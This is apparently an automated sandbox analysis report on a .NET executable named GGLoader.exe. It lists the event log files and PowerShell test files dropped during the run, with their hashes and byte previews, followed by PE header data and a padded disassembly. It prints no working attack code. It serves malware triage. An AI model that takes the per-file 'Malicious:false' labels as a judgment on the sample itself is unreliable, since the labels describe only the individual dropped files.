                                                                                                  Preview:ElfChnk....................................../..(4............................................................................................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&..................................................................................../..................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):0.2039489788222188
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:MjW4jrP+MZQNRBEZWTENO4bpBko7S/6FgVt:qNKNVaO80o7S/6Fg
                                                                                                  MD5:A934F4F98D4742F0E6D8A2E4B3CDFB97
                                                                                                  SHA1:E6C6D16883024C9BFC611E72D9B4909042DDB51F
                                                                                                  SHA-256:E43229A598FA23306940E52047729209D3A1CC7CA969BA32BA1584E7C1AF2328
                                                                                                  SHA-512:76340C59B524B7E8737457121AFB8B7B865DFEA6BAF0CB0351228E3CFD25583063DCD1EE018189D6CC7A35BDC1E4B7F0DE2CADAFA9F02A3DC91CD9A581E7BE3C
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk........................................................................................................................................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............M.G...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):1.6469884746870727
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:/hpivNiGiriPiYiriDfiS83i0iGiTiYiUisiuiZi+iTiciUiQiJiUiBi4i/iAixQ:/G7t8H
                                                                                                  MD5:FC81D9FBA555C6BC7223594B8F6B46DE
                                                                                                  SHA1:971F47CFC0E1DCA462928DA2D8BE2B16D5A0629C
                                                                                                  SHA-256:9933922E09C49C5BA80292C4AED9EC9F457031E90B28B421DFFBD2F1BB840671
                                                                                                  SHA-512:7F2705E7526B49F76C5F2A76A88B83FC10591BAD68B451F5C67F841322076D4B408FC515EA59E0919907C73CBBD149AB5B5EE981083A52C9E90EC9FBFAD5254F
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.y...............y................... Q..(S...b.......................................................................t..............................................=.......................#...................................................................................................f...............?.......................P.......................M...F...............................................................................................................VG..................................**......y..........:............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):3.404020272954643
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:JPa0NeaqaWayaya6aOaCa2aqamayaia+aeaKaWaCaGaea+a+a2amaeaOaiaWaCaT:RN
                                                                                                  MD5:A1A37B9FDBCA9CC997AF86FEC22E5D70
                                                                                                  SHA1:4FAD3F77FA4AC3EDC7E977D2CDBA244B4DDFABBF
                                                                                                  SHA-256:B37A37298273FAAE3EFE50A6CA3213B495E2715894378238D7A0DC26E2293C95
                                                                                                  SHA-512:5FC6B994D2F2F55113E9E216C59BA1B04DB67503A429C547BFB0A9E7E78E7B33B80522AE083ADACCC5370A4A07897165C1DB0E356335CF33259532AE7331C65B
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........@...............@...............`...%.%.......................................................................m.................`...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................9...................................**..H...........1.)...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):1.3132453844344478
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:hhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJnXJRXJtXJLXJjXJppXJ:hQ0yUkNYwD8imLE5nTtFpf
                                                                                                  MD5:6237EE0458A0478242B975E9BB7AA97D
                                                                                                  SHA1:6B0BDBA887DA21675A63FC73AED995B1BCA3F6B1
                                                                                                  SHA-256:C8E224C54278C206302EAD7011ACC48CAC60E7638E32EE70653190DBC90FA70A
                                                                                                  SHA-512:56C025C971F77AB8E911E0190E8AB5CF533A909C1BF4558876FB2761AAA381CB7D21E44A3273FA4427CB2FF7DEECC15A312DD2A424B96ABDC4886BDF233F30E9
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk......................................<...A.........................................................................i,.q................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................<......C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.325262033408211
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:6hYmn9moomUmKBmZOmZmlmmmomRmemtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfO:6/fGTDcx
                                                                                                  MD5:D13189B45679E53F5744A4D449F8B00F
                                                                                                  SHA1:ED410CAB42772E329F656B4793B46AC7159CF05B
                                                                                                  SHA-256:BAA80D6A7DC42752766B1862A00009A1D76B57022A4D5A89692DBA2D6866EBA1
                                                                                                  SHA-512:83399CE082F8C6D2917B8363E053C770F2783B3D086F39736919FBFA533DF65993A3B7840A2E1000B08948584CF9750C27961BF8A7BE3A235B5DDD779616013F
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.....................................h.................................................................................-.................X...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................1...........&.......................................................................................**..x...........~_g...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):0.7947046118743749
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:jhr2zS2o202AW2D2t2l292l2V2p2d2N2:j8Q
                                                                                                  MD5:55E73A924B170FBFFF862E8E195E839A
                                                                                                  SHA1:3C625D05DFC08AE9DF26AEBAA82D72FC9F28ADB0
                                                                                                  SHA-256:1B36D85AA56A023F6646D6EF28C9DCB5358528274EDCC9B6ED20705E3007E8A2
                                                                                                  SHA-512:E14D32569F37A827EDBD1F02667866431C856D087A396933DE5E9B87943369C4802D220557050C7B0FE9367FBD0683676776E6D3CCBCB290C9F30D86EC529E28
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk...................................... ..X"...........................................................................?.................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...............................3...........................&.......................................................................................**................................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:modified
                                                                                                  Size (bytes):70072
                                                                                                  Entropy (8bit):4.364123808339816
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:zGhSR+h/qRn/RqR5RVR+rRvR3RFRXRmRbR+RLRlRFRDRiwhR3KR31RIRB8R+PRd1:aFK8nPLGb/3Fv
                                                                                                  MD5:93EDEA23FE762BAC91ECD808CD994F0E
                                                                                                  SHA1:C86C7F63A89B96286319EEBC9EA7AEFA0A236CFB
                                                                                                  SHA-256:321215F7DDB2E429DF27272C931BE54AD0994EAA436A67D5787786FE5082A208
                                                                                                  SHA-512:23C7BC3541B56BBC35B7A5D169901C07C1D6C62BA967A50F32E833ABAD5C2BE5EEF998A07F563B8ABB347AD56BCC0B9AFE103B54DC2F5DEB36158047FC19C44E
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk..............................................w7.......................................................................4\............................................=...................................................................%...................................................x...f...Z.......l...?.......................................?.......M...F...9...........}...................................Q.......................................................(...&...................................**................p............x68&........x68%..U.l...z..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.273338343434408
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:mhWhjhUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhC1:mBsFpkBjOFK
                                                                                                  MD5:C37372EB51AEDB4552CB839C7294403A
                                                                                                  SHA1:7B7C408D72B084CE36AA6B623AC6B907FD21D569
                                                                                                  SHA-256:C3B5D9D16F88507EF69A9B6FF8581AEBAFF84D254F62CD4E75B6A9C6F93E93C4
                                                                                                  SHA-512:69183719C29FCE5CEDB2634579ABA9FEF835A3CDC7668BB741F9DB36050756C088FD331E898DA8E4850887FD217B939DF1C5A3E7D73D2260CB3AC3570E71718E
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk....................................................................................................................x...........................................8...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............i.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):1.231195890775603
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVt9VjViVyVKVui:Zyjbn
                                                                                                  MD5:3365A34953FD7B16667108A049B64DA5
                                                                                                  SHA1:C72421A58E063D64072152344B266F8306A78702
                                                                                                  SHA-256:AAEDFFE84B66B602858AF51D5B2EBA7CFC9DB57A4A3DD3240DB44B737B9BBF26
                                                                                                  SHA-512:A5569EDC7516DACCCE7B3135114588E01ED1A77CA95B0F378E389E27AC8999EA71E8AF36FD275EEA7E81987CB9BF14910645DE3DC4FE8E086FF532796DD78AAF
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........!...............!............7..`8...j......................................................................@..#................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v....................................................3..................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.350962660703774
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:6h+BwB5BwBjBwBNSBwBYiBwB+BwBXBwBZabSqBwBlQBwBtfBwBvBwBPnBwBIrBwa:6OqabeGTnbuSx6x
                                                                                                  MD5:C16BA55E2BC1361112DD3C652AC47461
                                                                                                  SHA1:0F54324A386BDCAE8F15E7468E806CAF38F43B3C
                                                                                                  SHA-256:48436A31DED313957F41DB41F0836DE8304EA1949E2543B1F3B4052143988D2C
                                                                                                  SHA-512:DF1B8665FCCD61A8948133FE1917FE6D1F1085D33A36E8E76D520D5E32AEA80703F1404177F3A3D64794E8A0AE61752760B1B053D639DDE656C6F1F0152740E8
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.....................................H...x...n.~t....................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F....................S......................................&...................................u...................................................**...............Dbf..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.421206160086997
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ah1qUEzUELUEnUEQUEpUE9UE4UEvUEqUEGUEuUEyUEpjUEmUE6UEVUE1UEdUEoUF:arN5mPfkvmR
                                                                                                  MD5:67CAD90771EBC0BD20736201D89C1586
                                                                                                  SHA1:EE241B07EBD6E7A64AE367520F5C0665F4EBBAD7
                                                                                                  SHA-256:7801ED56F87C5A71A42128D089176CFDAACCCD6998EACCD07E46207F2CD48467
                                                                                                  SHA-512:27DE77A98E11A1D33B648B9F46671F61338B1746032B4AD8F003A8A5C52FB7C3ECCB834057074EF5FCD3459A0810439BAF63E1320B385F7A5E81757A90BBFD13
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........l...............l...............@....^.....................................................................+t].................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......Q8.......................................................6......................**...............yM..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):72424
                                                                                                  Entropy (8bit):4.341303148201864
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:0FFR8oIonS6cWNfoLSbdsLSvnQYoxMtg6Wo9MtxLo9MtMozonuoxNo/Vo1+o/xo+:oca1ZGg6UziBIesJ
                                                                                                  MD5:8F29885E3BD831215B07A0741EA1E49F
                                                                                                  SHA1:7757891A939097A689F9065025C17660B3AF7843
                                                                                                  SHA-256:E6B39D940ED21F048565F4A0B3AC7AFD877C4581F8C94D54532F36DB6FD8F004
                                                                                                  SHA-512:DF78CBB49F0A5D94C63697DD29028930159C921982157D4EFFA1D6ABDDFE6C31FF28412A78967343023E0A238E5E768E4833487F2470FFA73E5D34B5EDCAC1C2
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.................U.......U...................<..........................................................................o....................s...h...............N...=...................................................N...............................................w.......4.......................-...................................[...........).......M...R...:...........................................................&...................................................................................**......U........Ik............Wt.&........Wt...wX..9Ck?5.?.......A..3...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....\...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):66736
                                                                                                  Entropy (8bit):4.413089517062763
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:MH93FR8WHgBCQ19pWKOH9x/leADoND+GnqmYqPeqXIRmR0R5HeJvGAgXZIpURCO5:Md1UC1dPnLmLQXHmtpJnqiNHpzoQp
                                                                                                  MD5:1234DF6628BF6800EBDF20F79382EB9A
                                                                                                  SHA1:782B3D34873220086066A5095E4B42447E3592CC
                                                                                                  SHA-256:ADCB1ED938A0EDB84475C9B93E3D10B91EC8D0DD4B8A6804C1D8A6A708308568
                                                                                                  SHA-512:5AF7AAB5BE0DCC8CFEE043EE6E921614D06C31812920FB590D7F7400E0E4736CBFE77E52101E1A635AE3A2E328FC2433FAD80F5B969D379727575B047017CE01
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.................m.......w.....................t........................................................................................@...s...h...............h...=...................................................N...............................................w.......0.......................E...................................W...........).......M...3...:...........................................................................................................................&...................**......w......../a..............................................................................8.............!................@./a....jv.n'(.I..d.K[.........w....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.D.N.S.-.C.l.i.e.n.t.n....~.I...x.=.MS.y.s.t.e.m....................@.\...o...................@....A..)...h........=.......Q.u.e.r.y.N.a.m.e.......A..1...h...#....=.......A.d.d.r.e.s.s.L.e.n.g.t.h.......A..%...h........=.......A.d.d.r.e.s.s.............@...........f.e.3
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):127064
                                                                                                  Entropy (8bit):3.709372309544318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:4K7tyK7tKK7t11d1MK7tfK7tyK7tKK7t11d1MK7tsd1:4K7tyK7tKK7t11d1MK7tfK7tyK7tKK7q
                                                                                                  MD5:C1A07EEF64EC871BC17E32FAE1FDC68E
                                                                                                  SHA1:C2C06944B5148EDD3E12E2A21F75BC9006E8EE37
                                                                                                  SHA-256:2B3FF96FB9FAF3E5FB8725E472FE35B87F126B6A5385B920D6E57FF42085C5A7
                                                                                                  SHA-512:5FC876EFCB8AD2F7703824E37E88C10971114E368116C07C7CE7E594FAE5F5E5D864ABF097DD7B906527D11CC9EA2F397DFDFCE6E1784FF4121A8B5024231FE4
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.-.......1...........................p...X......R.......................................................................k............................................=..........................................................................................................................._...............8...........................f...................M...c...........................n...............................................&.......................................................................**...3..........U.t...........B.&........B...._j..d.:Ad........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):4.221217187761465
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name:GGLoader.exe
File size:19'456 bytes
MD5:982e4ae4559538cfb529dfaff0507880
SHA1:a3b0e3989d6e40792134286e40448004ebeda077
SHA256:95a08f9fd8741d2b265a43143289af012ca24cee776609bc79337d63988246fd
SHA512:35d23d332c0389b3d3e7086613e60d73c158a7dd408bc4320ccb10aba8c2755ea99bf0d484cd257d53d42a6fe95a9bab0c606e7c580039aa5334767a4096662f
SSDEEP:384:/LVHmcPXblyCKGK9dnORWsK7PPZzcuIYZKJHtZW39cDpbJO:/hHHPbICKJEW7PPeQKy6db
TLSH:31921059A47BC406C063DE762CDD96B7CB59D8F2350C723B0298A32BBF817648D47AB4
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c.................B..........^a... ........@.. ....................................@................................
Icon Hash:90cececece8e8eb0
Entrypoint:0x40615e
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x63BFDCB7 [Thu Jan 12 10:11:03 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
